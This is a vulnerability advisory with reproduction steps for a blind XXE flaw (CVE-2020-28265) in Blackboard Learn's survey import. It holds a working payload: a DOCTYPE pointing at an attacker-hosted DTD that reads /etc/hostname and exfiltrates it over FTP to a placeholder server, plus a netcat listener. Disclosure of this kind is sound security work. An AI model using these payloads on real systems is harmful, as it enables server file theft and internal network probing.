# xxe_blind_http_ftp

Affects Blackboard Learn 3800.19.0-rel.54+54663c8

Assigned CVE-2020-28265 (same CVE as [xxe_survey](xxe_survey.md))

An XXE (XML external entity) vulnerability in an exported **Tests, Surveys, Pools** XML package allows for arbitrary server files to be read and arbitrary URLs to be accessed when imported using the corresponding import **Tests, Surveys, Pools** functionality. **Note: this vulnerability is similar to [xxe_survey](xxe_survey.md), with the added danger that it can be used to probe internal network assets and conduct server-side request forgery (SSRF).**

## Prerequisites

  - Instructor role in Blackboard Learn

## Steps to reproduce (assumes you control a reachable server capable of serving HTTP and FTP)

  1. Navigate to **Course Tools > Tests, Surveys, Pools > Surveys**
  2. Build a new survey with a name and description and save it without adding any questions
  3. Export and save the survey locally by clicking on the dropdown arrow next to the survey name
  4. Unzip the package
  5. Edit the file ```res00001.dat``` and add the following after ```<?xml version="1.0" encoding="UTF-8"?>``` (replace ```<server>``` with the address of a webserver you control):
```
<!DOCTYPE data SYSTEM "http://<server>/xxe.dtd">
```
  6. Insert ```&send;``` as content in the tag ```<mat_formattedtext type="HTML">``` that contains the description you entered when you created the survey:
```
<mat_formattedtext type="HTML">&lt;p&gt;&send;Sample description&lt;/p&gt;</mat_formattedtext>
```
  7. Create the file ```xxe.dtd``` in the webroot of server ```<server>``` referred to above:
```
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://<server>:2121/%file;'>">
%all;
```
  8. Run the following command on ```<server>``` (or start an FTP server on port 2121):
```
(while true; do echo -ne '220 Ok\r\n'; done) | nc -lvp 2121
```
  9. Zip the package and import it as a survey in **Surveys**
  10. The webserver logs should show the request for ```xxe.dtd``` and the file contents (one line) should appear from the above command (or in the FTP server logs).

Caveats:
  1. Exfiltrated file must be ASCII
  2. Exfiltrated file must not contain < or >
  3. Exfiltrated file must be readable by user ```bbuser```
  4. Exfiltrated file can only be a single line

[Video demo](https://gitlab.com/donnm/cves/-/raw/master/demos/xxe_blind_ftp.mp4)

<video controls=true allowfullscreen=true>
<source src="https://gitlab.com/donnm/cves/-/raw/master/demos/xxe_blind_ftp.mp4" type="video/mkv"/>
</video>

## Timeline

- 2020-11-01 Discovered
- 2020-11-06 Notified vendor (Blackboard Inc.)
